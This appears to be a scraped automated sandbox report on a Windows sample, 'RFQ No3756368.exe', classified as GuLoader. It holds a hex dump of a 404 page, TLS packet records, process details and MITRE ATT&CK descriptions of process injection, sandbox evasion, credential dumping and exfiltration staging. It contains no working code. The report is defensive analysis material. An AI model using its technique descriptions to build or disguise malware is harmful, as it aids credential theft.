61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 15, 2021 13:03:15.556330919 CEST	142.250.201.193	443	192.168.2.4	49755	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Mon May 17 04:58:56 CEST 2021 Thu Jun 15 02:00:42 CEST 2017	Mon Aug 09 04:58:55 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jun 15, 2021 13:03:15.556330919 CEST	142.250.201.193	443	192.168.2.4	49755	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: RFQ No3756368.exe PID: 6528 Parent PID: 6064

General

Start time:	13:02:05
Start date:	15/06/2021
Path:	C:\Users\user\Desktop\RFQ No3756368.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFQ No3756368.exe'
Imagebase:	0x400000
File size:	143360 bytes
MD5 hash:	CE51F15D31008C3606729B00036FE841
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: RFQ No3756368.exe PID: 6824 Parent PID: 6528

General

Start time:	13:02:39
Start date:	15/06/2021
Path:	C:\Users\user\Desktop\RFQ No3756368.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFQ No3756368.exe'
Imagebase:	0x400000
File size:	143360 bytes
MD5 hash:	CE51F15D31008C3606729B00036FE841
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RFQ No3756368.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations